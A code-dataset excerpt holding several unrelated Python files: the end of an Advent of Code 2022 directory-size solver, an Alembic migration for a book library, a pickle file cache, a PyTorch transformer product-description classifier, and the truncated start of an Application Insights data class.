..\r\n$ cd ..\r\n$ cd d\r\n$ ls\r\n4060174 j\r\n8033020 d.log\r\n5626152 d.ext\r\n7214296 k\r\nThe filesystem consists of a tree of files (plain data) and directories (which can contain other directories or files). The outermost directory is called /. You can navigate around the filesystem, moving into or out of directories and listing the contents of the directory you're currently in.\r\n\r\nWithin the terminal output, lines that begin with $ are commands you executed, very much like some modern computers:\r\n\r\ncd means change directory. This changes which directory is the current directory, but the specific result depends on the argument:\r\ncd x moves in one level: it looks in the current directory for the directory named x and makes it the current directory.\r\ncd .. moves out one level: it finds the directory that contains the current directory, then makes that directory the current directory.\r\ncd / switches the current directory to the outermost directory, /.\r\nls means list. It prints out all of the files and directories immediately contained by the current directory:\r\n123 abc means that the current directory contains a file named abc with size 123.\r\ndir xyz means that the current directory contains a directory named xyz.\r\nGiven the commands and output in the example above, you can determine that the filesystem looks visually like this:\r\n\r\n- / (dir)\r\n - a (dir)\r\n - e (dir)\r\n - i (file, size=584)\r\n - f (file, size=29116)\r\n - g (file, size=2557)\r\n - h.lst (file, size=62596)\r\n - b.txt (file, size=14848514)\r\n - c.dat (file, size=8504156)\r\n - d (dir)\r\n - j (file, size=4060174)\r\n - d.log (file, size=8033020)\r\n - d.ext (file, size=5626152)\r\n - k (file, size=7214296)\r\nHere, there are four directories: / (the outermost directory), a and d (which are in /), and e (which is in a). These directories also contain files of various sizes.\r\n\r\nSince the disk is full, your first step should probably be to find directories that are good candidates for deletion. To do this, you need to determine the total size of each directory. The total size of a directory is the sum of the sizes of the files it contains, directly or indirectly. (Directories themselves do not count as having any intrinsic size.)\r\n\r\nThe total sizes of the directories above can be found as follows:\r\n\r\nThe total size of directory e is 584 because it contains a single file i of size 584 and no other directories.\r\nThe directory a has total size 94853 because it contains files f (size 29116), g (size 2557), and h.lst (size 62596), plus file i indirectly (a contains e which contains i).\r\nDirectory d has total size 24933642.\r\nAs the outermost directory, / contains every file. Its total size is 48381165, the sum of the size of every file.\r\nTo begin, find all of the directories with a total size of at most 100000, then calculate the sum of their total sizes. In the example above, these directories are a and e; the sum of their total sizes is 95437 (94853 + 584). (As in this example, this process can count files more than once!)\r\n\r\nFind all of the directories with a total size of at most 100000. What is the sum of the total sizes of those directories?\"\"\"\r\n\r\n# Solution\r\n\r\n# change directory to this file's directory\r\nimport os\r\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\r\n\r\n# read input\r\nwith open('input.txt', 'r') as file:\r\n\tinput = file.read().splitlines()\r\n\r\n# import anytree\r\nfrom anytree import Node, RenderTree\r\n\r\n# create root node\r\nroot = Node('/')\r\nroot.size = 0\r\n\r\n# set current node to root\r\ncurrent = root\r\n\r\n# create nodes\r\nfor line in input:\r\n\t# split line into tokens\r\n\ttokens = line.split(' ')\r\n\t# if line is command\r\n\tif tokens[0] == '$':\r\n\t\t# if command is cd\r\n\t\tif tokens[1] == 'cd':\r\n\t\t\t# if argument is ..\r\n\t\t\tif tokens[2] == '..':\r\n\t\t\t\t# move up one level\r\n\t\t\t\tcurrent = current.parent\r\n\t\t\t# if argument is /\r\n\t\t\telif tokens[2] == '/':\r\n\t\t\t\t# move to root\r\n\t\t\t\tcurrent = root\r\n\t\t\t# if argument is directory\r\n\t\t\telse:\r\n\t\t\t\t# move to directory\r\n\t\t\t\t# current = current.children[tokens[2]]\r\n\t\t\t\t# but children is a tuple and must use index\r\n\t\t\t\t# so we have to do this instead\r\n\t\t\t\tfor child in current.children:\r\n\t\t\t\t\tif child.name == tokens[2]:\r\n\t\t\t\t\t\tcurrent = child\r\n\t\t\t\t\t\tbreak\r\n\t# if line is directory\r\n\telif tokens[0] == 'dir':\r\n\t\t# create directory and add to current node\r\n\t\t# current.children.append(Node(tokens[1]))\r\n\t\t# but children is a tuple and has no append method\r\n\t\t# so we have to do this instead\r\n\t\tcurrent.children = current.children + (Node(tokens[1], size=0),)\r\n\t# if line is file\r\n\telse:\r\n\t\t# create file and add to current node\r\n\t\tfile = Node(tokens[1], size=int(tokens[0]))\r\n\t\t# current.children.append(file)\r\n\t\t# but children is a tuple and has no append method\r\n\t\t# so we have to do this instead\r\n\t\tcurrent.children = current.children + (file,)\r\n\r\n# calculate total size of each node recursively\r\ndef calculate_total_size(node):\r\n\t# if node is directory\r\n\tif node.is_leaf == False:\r\n\t\t# for each child of node\r\n\t\tfor child in node.children:\r\n\t\t\t# calculate child's total size\r\n\t\t\tcalculate_total_size(child)\r\n\t\t\t# add child's total size to node's total size\r\n\t\t\tnode.size += child.size\r\n\r\ncalculate_total_size(root)\r\n\r\n# render tree\r\n# for pre, fill, node in RenderTree(root):\r\n# \tprint(\"%s%s %s\" % (pre, node.name, node.size if hasattr(node, 'size') else ''))\r\n\r\n# find all directories with total size <= 100000\r\n# and calculate sum of their total sizes\r\nsum = 0\r\nfor pre, fill, node in RenderTree(root):\r\n\t# if node is directory\r\n\tif node.is_leaf == False:\r\n\t\t# if node has total size <= 100000\r\n\t\tif node.size <= 100000:\r\n\t\t\t# add node's total size to sum\r\n\t\t\tsum += node.size\r\n\r\n# print sum\r\nprint(sum)","repo_name":"Lefted/Advent-of-Code-2022","sub_path":"7/7a.py","file_name":"7a.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1003341613","text":"\"\"\"initial_migration\n\nRevision ID: cd6f78358781\nRevises: \nCreate Date: 2023-07-18 13:29:53.922013\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"v0.1.0\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"books\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"title\", sa.String(length=300), nullable=False),\n sa.Column(\"subtitle\", sa.String(length=300), nullable=True),\n sa.Column(\"published_date\", sa.String(length=30), nullable=True),\n sa.Column(\"publisher\", sa.String(length=100), nullable=False),\n sa.Column(\"description\", sa.Text(), nullable=True),\n sa.Column(\"image\", sa.Text(), nullable=True),\n sa.Column(\"original_source\", sa.String(length=30), nullable=False),\n sa.Column(\"external_id\", sa.String(length=30), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"title\", \"books\", [\"title\"], mysql_prefix='FULLTEXT')\n op.create_index(\"subtitle\", \"books\", [\"subtitle\"], mysql_prefix='FULLTEXT')\n op.create_index(\"published_date\", \"books\", [\"published_date\"], mysql_prefix='FULLTEXT')\n op.create_index(\"publisher\", \"books\", [\"publisher\"], mysql_prefix='FULLTEXT')\n op.create_index(\"description\", \"books\", [\"description\"], mysql_prefix='FULLTEXT')\n op.create_table(\n \"authors\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"name\", sa.String(length=100), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"name\", \"authors\", [\"name\"], mysql_prefix='FULLTEXT')\n op.create_table(\n \"categories\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"name\", sa.String(length=100), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"name\", \"categories\", [\"name\"], mysql_prefix='FULLTEXT')\n op.create_table(\n \"book_authors\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"book_id\", sa.Integer(), sa.ForeignKey('books.id', ondelete='CASCADE'), nullable=False),\n sa.Column(\"author_id\", sa.Integer(), sa.ForeignKey('authors.id'), nullable=False),\n sa.UniqueConstraint(\"book_id\", \"author_id\")\n )\n op.create_table(\n \"book_categories\",\n sa.Column(\"updated_at\", sa.DateTime(), nullable=True),\n sa.Column(\"created_at\", sa.DateTime(), nullable=True),\n sa.Column(\"book_id\", sa.Integer(), sa.ForeignKey('books.id', ondelete='CASCADE'), nullable=False),\n sa.Column(\"category_id\", sa.Integer(), sa.ForeignKey('categories.id'), nullable=False),\n sa.UniqueConstraint(\"book_id\", \"category_id\")\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"books\")\n op.drop_table(\"authors\")\n op.drop_table(\"categories\")\n op.drop_table(\"book_authors\")\n op.drop_table(\"book_categories\")\n # ### end Alembic commands ###\n","repo_name":"asgutierrez/library","sub_path":"r5/Migration/versions/0.1.0.py","file_name":"0.1.0.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24078054011","text":"import hashlib, os, sys\nfrom fs import mkdirs, dirname #, filePutContents, fileGetContents\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\n\"\"\"\n@description A static singleton-esque file-based key/value cache.\n\n@date 2012-04-19\n\"\"\"\n\nCACHE_BASE_PATH = '%s/.cache/wget' % dirname(sys.argv[0])\n\ndef set(key, data):\n #print 'storing %s => %s' % (key, data)\n filePath = _constructPathFromKey(key)\n parentPath = dirname(filePath)\n if not os.path.exists(parentPath):\n mkdirs(parentPath)\n with open(filePath, 'w') as fh:\n return pickle.dump(data, fh) #filePutContents(_constructPathFromKey(key), data)\n\ndef get(key):\n try:\n with open(_constructPathFromKey(key), 'r') as fh:\n return pickle.load(fh) #fileGetContents(_constructPathFromKey(key))\n except IOError:\n return None\n\ndef _constructPathFromKey(key):\n k = hashlib.md5(key).hexdigest()\n #print '%s/%s/%s/%s' % (CACHE_BASE_PATH, k[0], k[1], k)\n return '%s/%s/%s/%s' % (CACHE_BASE_PATH, k[0], k[1], k)\n\n","repo_name":"sleaze/sleazy-indexing-utils","sub_path":"lib/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"17979867140","text":"\"\"\"\ntransformer text classifier\n\nconda activate rasy-pDL\nnohup python transformer_classfier.py -m baseline_word_split_replace_nums -d /data/work/may28/ --device 0 --word_split True --replace_nums True> baseline_word_split_replace_nums.log &\n\nauthor: Syed Rahman\n\"\"\"\n\nimport numpy as np\nimport torch\nfrom text_cleaner import normalize\nfrom torchtext.utils import download_from_url, unicode_csv_reader\nfrom torchtext.data import Field, TabularDataset, BucketIterator, Dataset, Example\nimport torchtext.datasets as datasets\nimport torchtext.data as data\nimport torchtext\nimport torch.nn.functional as f\nfrom torch import nn\nimport copy\nimport io\nimport os\nimport sys\nimport pandas as pd\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-m\", \"--model_name\", type=str, help=\"model path\")\nparser.add_argument(\"-d\", \"--data_dir\", type=str, help=\"data path\")\nparser.add_argument(\"--train\", type=str,\n help=\"train file name\", default='train.txt')\nparser.add_argument(\"--test\", type=str,\n help=\"test file name\", default='test.txt')\nparser.add_argument(\"--validate\", type=str,\n help=\"validate file path\", default='validate.txt')\nparser.add_argument(\"--device\", type=str, help=\"cuda device number\", default=0)\nparser.add_argument(\"--num_words\", type=int,\n help=\"cuda device number\", default=None)\nparser.add_argument(\"--batch_size\", type=int,\n help=\"cuda device number\", default=1024)\nparser.add_argument(\"--dropout\", type=float,\n help=\"cuda device number\", default=0.1)\nparser.add_argument(\"--lr\", type=float,\n help=\"cuda device number\", default=0.001)\nparser.add_argument(\"--word_split\", type=bool,\n help=\"use ninja word splitter\", default=False)\nparser.add_argument(\"--replace_nums\", type=bool,\n help=\"replace numbers with words\", default=False)\nargs = parser.parse_args()\nprint(args)\n\n\nprint(torch.__version__)\ntorch.cuda.is_available()\n\n\ndata_dir = args.data_dir\ndscb_train_fn = args.train\ndscb_validate_fn = args.validate\ndscb_test_fn = args.test\n\ndevice = torch.device(\n \"cuda:\"+args.device if torch.cuda.is_available() else \"cpu\")\n\n\ndef charNGramtokenizer(sentence, n=3):\n return [sentence[i:i+n] for i in range(len(sentence)-n+1)]\n\n\ndef wordTokenizer(sentence):\n return sentence.split()\n\n\ndef normalizedWordTokenizer(sentence, word_split, replace_nums):\n sentence = normalize(sentence, args.word_split, args.replace_nums)\n return sentence.split()\n\n\ndef save_vocab(vocab, path):\n import pickle\n output = open(path, 'wb')\n pickle.dump(vocab, output)\n output.close()\n\n\ndscb_train = pd.read_csv(os.path.join(\n data_dir, dscb_test_fn), sep='\\x01', dtype=str)\n\nmax_len = 100\n\ntext = Field(sequential=True, tokenize=normalizedWordTokenizer,\n fix_length=max_len, batch_first=True, lower=True, dtype=torch.long)\ndscb = Field(sequential=False, dtype=torch.long)\ndsc = Field(sequential=False, dtype=torch.long)\nb = Field(sequential=False, dtype=torch.long)\n\nfields = []\nfor col in dscb_train.columns:\n if col == \"cleaned_description\":\n fields.append((\"text\", text))\n elif col == \"dscb\":\n fields.append((\"dscb\", dscb))\n elif col == \"dsc\":\n fields.append((\"dsc\", dsc))\n elif col == \"omni_brand_id\":\n fields.append((\"b\", b))\n else:\n fields.append((col, None))\n\n\nclass TabularDataset(Dataset):\n \"\"\"Defines a Dataset of columns stored in CSV, TSV, or JSON format.\"\"\"\n\n def __init__(self, path, format, fields, skip_header=False,\n csv_reader_params={}, **kwargs):\n \"\"\"Create a TabularDataset given a path, file format, and field list.\n Arguments:\n path (str): Path to the data file.\n format (str): The format of the data file. One of \"CSV\", \"TSV\", or\n \"JSON\" (case-insensitive).\n fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:\n If using a list, the format must be CSV or TSV, and the values of the list\n should be tuples of (name, field).\n The fields should be in the same order as the columns in the CSV or TSV\n file, while tuples of (name, None) represent columns that will be ignored.\n If using a dict, the keys should be a subset of the JSON keys or CSV/TSV\n columns, and the values should be tuples of (name, field).\n Keys not present in the input dictionary are ignored.\n This allows the user to rename columns from their JSON/CSV/TSV key names\n and also enables selecting a subset of columns to load.\n skip_header (bool): Whether to skip the first line of the input file.\n csv_reader_params(dict): Parameters to pass to the csv reader.\n Only relevant when format is csv or tsv.\n See\n https://docs.python.org/3/library/csv.html#csv.reader\n for more details.\n \"\"\"\n format = format.lower()\n make_example = {\n 'json': Example.fromJSON, 'dict': Example.fromdict,\n 'tsv': Example.fromCSV, 'csv': Example.fromCSV,\n '\\x01': Example.fromCSV}[format]\n\n with io.open(os.path.expanduser(path), encoding=\"utf8\") as f:\n if format == 'csv':\n reader = unicode_csv_reader(f, **csv_reader_params)\n elif format == 'tsv':\n reader = unicode_csv_reader(\n f, delimiter='\\t', **csv_reader_params)\n elif format == '\\x01':\n reader = unicode_csv_reader(\n f, delimiter='\\x01', **csv_reader_params)\n else:\n reader = f\n\n if format in ['csv', 'tsv', '\\x01'] and isinstance(fields, dict):\n if skip_header:\n raise ValueError('When using a dict to specify fields with a {} file,'\n 'skip_header must be False and'\n 'the file must have a header.'.format(format))\n header = next(reader)\n field_to_index = {f: header.index(f) for f in fields.keys()}\n make_example = partial(\n make_example, field_to_index=field_to_index)\n\n if skip_header:\n next(reader)\n\n examples = [make_example(line, fields) for line in reader]\n\n if isinstance(fields, dict):\n fields, field_dict = [], fields\n for field in field_dict.values():\n if isinstance(field, list):\n fields.extend(field)\n else:\n fields.append(field)\n\n super(TabularDataset, self).__init__(examples, fields, **kwargs)\n\n\nds_train, ds_valid, ds_test = TabularDataset.splits(\n path=args.data_dir,\n train=args.train,\n validation=args.validate,\n test=args.test,\n format='\\x01',\n skip_header=True,\n fields=fields)\n\nprint('train : ', len(ds_train))\nprint('test : ', len(ds_test))\nprint('train.fields :', ds_train.fields)\n\nif args.num_words is None:\n num_words = None\nelse:\n num_words = args.num_words\n\ntext.build_vocab(ds_train, max_size=num_words, specials=['', ''])\ndscb.build_vocab(ds_train)\ndsc.build_vocab(ds_train)\nb.build_vocab(ds_train)\nvocab = text.vocab\n\nprint(len(dscb.vocab.itos))\n\nif not os.path.exists('vocab'):\n os.makedirs('vocab')\n\nif not os.path.exists('models'):\n os.makedirs('models')\n\nsave_vocab(text.vocab, 'vocab/cleaned_description_'+args.model_name+'.pkl')\nsave_vocab(dscb.vocab, 'vocab/dscb_cleaned_desc_'+args.model_name+'.pkl')\nsave_vocab(dsc.vocab, 'vocab/dsc_cleaned_desc_'+args.model_name+'.pkl')\nsave_vocab(b.vocab, 'vocab/b_cleaned_desc_'+args.model_name+'.pkl')\n\nif args.batch_size is None:\n batch_size = 1024\nelse:\n batch_size = args.batch_size\n\ntrain_loader, valid_loader, test_loader = BucketIterator.splits(\n (ds_train, ds_valid, ds_test), batch_size=batch_size, sort_key=lambda x: len(x.text), repeat=False)\n\nnn_Softargmax = nn.Softmax # fix wrong name\n\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, d_model, num_heads, p, d_input=None):\n super().__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n if d_input is None:\n d_xq = d_xk = d_xv = d_model\n else:\n d_xq, d_xk, d_xv = d_input\n\n # Make sure that the embedding dimension of model is a multiple of number of heads\n assert d_model % self.num_heads == 0\n\n self.d_k = d_model // self.num_heads\n\n # These are still of dimension d_model. They will be split into number of heads\n self.W_q = nn.Linear(d_xq, d_model, bias=False)\n self.W_k = nn.Linear(d_xk, d_model, bias=False)\n self.W_v = nn.Linear(d_xv, d_model, bias=False)\n\n # Outputs of all sub-layers need to be of dimension d_model\n self.W_h = nn.Linear(d_model, d_model)\n\n def scaled_dot_product_attention(self, Q, K, V):\n batch_size = Q.size(0)\n k_length = K.size(-2)\n\n # Scaling by d_k so that the soft(arg)max doesnt saturate\n # (bs, n_heads, q_length, dim_per_head)\n Q = Q / np.sqrt(self.d_k)\n # (bs, n_heads, q_length, k_length)\n scores = torch.matmul(Q, K.transpose(2, 3))\n\n A = nn_Softargmax(dim=-1)(scores) # (bs, n_heads, q_length, k_length)\n\n # Get the weighted average of the values\n H = torch.matmul(A, V) # (bs, n_heads, q_length, dim_per_head)\n\n return H, A\n\n def split_heads(self, x, batch_size):\n \"\"\"\n Split the last dimension into (heads X depth)\n Return after transpose to put in shape (batch_size X num_heads X seq_length X d_k)\n \"\"\"\n return x.view(batch_size, -1, self.num_heads, self.d_k).transpose(1, 2)\n\n def group_heads(self, x, batch_size):\n \"\"\"\n Combine the heads again to get (batch_size X seq_length X num_heads X d_k)\n \"\"\"\n return x.transpose(1, 2).contiguous().view(batch_size, -1, self.num_heads * self.d_k)\n\n def forward(self, X_q, X_k, X_v):\n batch_size, seq_length, dim = X_q.size()\n\n # After transforming, split into num_heads\n # (bs, n_heads, q_length, dim_per_head)\n Q = self.split_heads(self.W_q(X_q), batch_size)\n # (bs, n_heads, k_length, dim_per_head)\n K = self.split_heads(self.W_k(X_k), batch_size)\n # (bs, n_heads, k_length, dim_per_head)\n V = self.split_heads(self.W_v(X_v), batch_size)\n\n # Calculate the attention weights for each of the heads\n H_cat, A = self.scaled_dot_product_attention(Q, K, V)\n\n # Put all the heads back together by concat\n H_cat = self.group_heads(H_cat, batch_size) # (bs, q_length, dim)\n\n # Final linear layer\n H = self.W_h(H_cat) # (bs, q_length, dim)\n\n return H, A\n\n\nclass CNN(nn.Module):\n def __init__(self, d_model, hidden_dim, p):\n super().__init__()\n self.k1convL1 = nn.Linear(d_model, hidden_dim)\n self.dropout1 = nn.Dropout(p=p)\n self.k1convL2 = nn.Linear(hidden_dim, d_model)\n self.activation = nn.ReLU()\n\n def forward(self, x):\n x = self.k1convL1(x)\n x = self.activation(x)\n x = self.dropout1(x)\n x = self.k1convL2(x)\n return x\n\n\nclass EncoderLayer(nn.Module):\n def __init__(self, d_model, num_heads, conv_hidden_dim, p=0.1):\n super().__init__()\n\n self.mha = MultiHeadAttention(d_model, num_heads, p)\n self.cnn = CNN(d_model, conv_hidden_dim, p)\n\n self.layernorm1 = nn.LayerNorm(normalized_shape=d_model, eps=1e-6)\n self.layernorm2 = nn.LayerNorm(normalized_shape=d_model, eps=1e-6)\n\n def forward(self, x):\n\n # Multi-head attention\n # (batch_size, input_seq_len, d_model)\n attn_output, _ = self.mha(x, x, x)\n\n # Layer norm after adding the residual connection\n # (batch_size, input_seq_len, d_model)\n out1 = self.layernorm1(x + attn_output)\n\n # Feed forward\n cnn_output = self.cnn(out1) # (batch_size, input_seq_len, d_model)\n\n # Second layer norm after adding residual connection\n # (batch_size, input_seq_len, d_model)\n out2 = self.layernorm2(out1 + cnn_output)\n\n return out2\n\n\ndef create_sinusoidal_embeddings(nb_p, dim, E):\n theta = np.array([\n [p / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)]\n for p in range(nb_p)\n ])\n E[:, 0::2] = torch.FloatTensor(np.sin(theta[:, 0::2]))\n E[:, 1::2] = torch.FloatTensor(np.cos(theta[:, 1::2]))\n E.detach_()\n E.requires_grad = False\n E = E.to(device)\n\n\nclass Embeddings(nn.Module):\n def __init__(self, d_model, vocab_size, max_position_embeddings, p):\n super().__init__()\n self.word_embeddings = nn.Embedding(vocab_size, d_model, padding_idx=1)\n self.position_embeddings = nn.Embedding(\n max_position_embeddings, d_model)\n create_sinusoidal_embeddings(\n nb_p=max_position_embeddings,\n dim=d_model,\n E=self.position_embeddings.weight\n )\n\n self.LayerNorm = nn.LayerNorm(d_model, eps=1e-12)\n\n def forward(self, input_ids):\n seq_length = input_ids.size(1)\n position_ids = torch.arange(\n seq_length, dtype=torch.long, device=input_ids.device) # (max_seq_length)\n position_ids = position_ids.unsqueeze(0).expand_as(\n input_ids) # (bs, max_seq_length)\n\n # Get word embeddings for each input id\n word_embeddings = self.word_embeddings(\n input_ids) # (bs, max_seq_length, dim)\n\n # Get position embeddings for each position id\n position_embeddings = self.position_embeddings(\n position_ids) # (bs, max_seq_length, dim)\n\n # Add them both\n embeddings = word_embeddings + \\\n position_embeddings # (bs, max_seq_length, dim)\n\n # Layer norm\n # (bs, max_seq_length, dim)\n embeddings = self.LayerNorm(embeddings)\n return embeddings\n\n\nclass Encoder(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, ff_hidden_dim, input_vocab_size,\n maximum_position_encoding, p=0.1):\n super().__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = Embeddings(\n d_model, input_vocab_size, maximum_position_encoding, p)\n\n self.enc_layers = nn.ModuleList()\n for _ in range(num_layers):\n self.enc_layers.append(EncoderLayer(\n d_model, num_heads, ff_hidden_dim, p))\n\n def forward(self, x):\n # Transform to (batch_size, input_seq_length, d_model)\n x = self.embedding(x)\n\n for i in range(self.num_layers):\n x = self.enc_layers[i](x)\n\n return x # (batch_size, input_seq_len, d_model)\n\n\nclass TransformerClassifier(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size, num_answers):\n super().__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size,\n maximum_position_encoding=10000)\n self.dropout = nn.Dropout(p=0.2)\n self.dense = nn.Linear(d_model, num_answers)\n\n def forward(self, x):\n x = self.encoder(x)\n\n x, _ = torch.max(x, dim=1)\n x = self.dropout(x)\n x = self.dense(x)\n return x\n\n\nclass TransformerClassifierDSCB(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size, num_dsc, num_b, p):\n super().__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size,\n maximum_position_encoding=10000)\n self.dropout = nn.Dropout(p=p)\n self.dense = nn.Linear(d_model, num_dsc)\n self.dense1 = nn.Linear(d_model, num_b)\n\n def forward(self, x):\n x = self.encoder(x)\n x, _ = torch.max(x, dim=1)\n x = self.dropout(x)\n x0 = self.dense(x)\n x1 = self.dense1(x)\n return x0, x1\n\n\nclass TransformerClassifierHrclDSCB(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size, num_d, num_s, num_c, num_b, p):\n super().__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size,\n maximum_position_encoding=10000)\n self.dropout = nn.Dropout(p=p)\n self.dense0 = nn.Linear(d_model, num_d)\n self.dense1 = nn.Linear(d_model+num_d, num_s)\n self.dense2 = nn.Linear(d_model+num_d+num_s, num_c)\n self.dense3 = nn.Linear(d_model+num_d+num_s+num_c, num_b)\n\n def forward(self, x):\n x = self.encoder(x)\n x, _ = torch.max(x, dim=1)\n x = self.dropout(x)\n\n x_d = self.dense0(x)\n x_s = self.dense1(torch.cat((x, x_d), 1))\n x_c = self.dense2(torch.cat((x, x_d, x_s), 1))\n x_b = self.dense3(torch.cat((x, x_d, x_s, x_c), 1))\n return x_d, x_s, x_c, x_b\n\n\nnum_dsc = len(dsc.vocab.itos)\nnum_b = len(b.vocab.itos)\nnum_words = len(text.vocab.itos)\n\nmodel = TransformerClassifierDSCB(num_layers=2, d_model=128, num_heads=8,\n conv_hidden_dim=128, input_vocab_size=num_words+2,\n num_dsc=num_dsc, num_b=num_b, p=args.dropout)\nmodel.to(device)\n\noptimizer = torch.optim.AdamW(model.parameters(), lr=args.lr)\nepochs = 100\nt_total = len(train_loader) * epochs\n\nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n mode='min',\n factor=0.1,\n patience=3,\n verbose=True)\n\n\ndef trainDSCB(train_loader, valid_loader):\n\n best_loss = 10**100\n\n for epoch in range(epochs):\n train_iterator, valid_iterator = iter(train_loader), iter(valid_loader)\n train_acc_dsc = 0\n train_acc_b = 0\n train_acc = 0\n model.train()\n losses = 0.0\n\n for idx, batch in enumerate(train_iterator):\n x = batch.text.to(device)\n y_dsc = batch.dsc.to(device)\n y_b = batch.b.to(device)\n\n out = model(x) # ①\n\n loss = f.cross_entropy(out[0], y_dsc) + \\\n f.cross_entropy(out[1], y_b) # ②\n\n model.zero_grad() # ③\n\n loss.backward() # ④\n losses += loss.item()\n\n optimizer.step() # ⑤\n\n train_acc_dsc += (out[0].argmax(1) == y_dsc).cpu().numpy().mean()\n train_acc_b += (out[1].argmax(1) == y_b).cpu().numpy().mean()\n train_acc += ((out[0].argmax(1) == y_dsc) &\n (out[1].argmax(1) == y_b)).cpu().numpy().mean()\n\n print(f\"Training loss at epoch {epoch} is {losses/idx}\")\n print(f\"Training accuracy for DSC: {train_acc_dsc/idx}\")\n print(f\"Training accuracy for B: {train_acc_b/idx}\")\n print(f\"Training accuracy: {train_acc/idx}\")\n print('Evaluating on validation:')\n\n model.eval()\n acc_dsc = 0\n acc_b = 0\n acc = 0\n val_losses = 0.0\n for idx, batch in enumerate(valid_iterator):\n x = batch.text.to(device)\n y_dsc = batch.dsc.to(device)\n y_b = batch.b.to(device)\n\n out = model(x)\n loss = f.cross_entropy(out[0], y_dsc) + \\\n f.cross_entropy(out[1], y_b)\n val_losses += loss.item()\n acc_dsc += (out[0].argmax(1) == y_dsc).cpu().numpy().mean()\n acc_b += (out[1].argmax(1) == y_b).cpu().numpy().mean()\n acc += ((out[0].argmax(1) == y_dsc) &\n (out[1].argmax(1) == y_b)).cpu().numpy().mean()\n\n print(f\"Validation accuracy for DSC: {acc_dsc/idx}\")\n print(f\"Validation accuracy for B: {acc_b/idx}\")\n print(f\"Validation accuracy: {acc/idx}\")\n\n if val_losses < best_loss:\n print('Updating best model')\n best_loss = copy.deepcopy(val_losses)\n best_model = copy.deepcopy(model)\n torch.save(best_model.state_dict(),\n 'models/'+args.model_name)\n\n scheduler.step(loss.item())\n\n return best_model\n\n\ndef evaluateDSCB(data_loader, best_model):\n data_iterator = iter(data_loader)\n\n best_model.eval()\n acc_dsc = 0\n acc_b = 0\n acc = 0\n\n for idx, batch in enumerate(data_iterator):\n x = batch.text.to(device)\n y_dsc = batch.dsc.to(device)\n y_b = batch.b.to(device)\n\n out = model(x)\n loss = f.cross_entropy(out[0], y_dsc) + f.cross_entropy(out[1], y_b)\n\n acc_dsc += (out[0].argmax(1) == y_dsc).cpu().numpy().mean()\n acc_b += (out[1].argmax(1) == y_b).cpu().numpy().mean()\n acc += ((out[0].argmax(1) == y_dsc) &\n (out[1].argmax(1) == y_b)).cpu().numpy().mean()\n\n print(f\"Eval accuracy for DSC: {acc_dsc/idx}\")\n print(f\"Eval accuracy for B: {acc_b/idx}\")\n print(f\"Eval accuracy: {acc/idx}\")\n\n\nif __name__ == '__main__':\n best_model = trainDSCB(train_loader, valid_loader)\n print('Evaluating on test:')\n evaluateDSCB(test_loader, best_model)\n","repo_name":"shr264/transformer-text-classfier","sub_path":"transformer_classfier.py","file_name":"transformer_classfier.py","file_ext":"py","file_size_in_byte":21525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16285347365","text":"import collections\nimport copy\nfrom .Utils import _write_complex_object\n\nclass Location(object):\n \"\"\"Data contract class for type Location.\n \"\"\"\n _defaults = collections.OrderedDict([\n ('ai.location.ip', None)\n ])\n \n def __init__(self):\n \"\"\"Initializes a new instance of the class.\n \"\"\"\n self._values = {\n }\n self._initialize()\n \n @property\n def ip(self):\n \"\"\"The ip property.\n \n Returns:\n (string). the property value. (defaults to: None)\n \"\"\"\n if 'ai.location.ip' in self._values:\n return self._values['ai.location.ip']\n return self._defaults['ai.location.ip']\n \n @ip.setter\n def ip(self, value):\n \"\"\"The ip property.\n \n Args:\n value (string). the property value.\n \"\"\"\n if value == 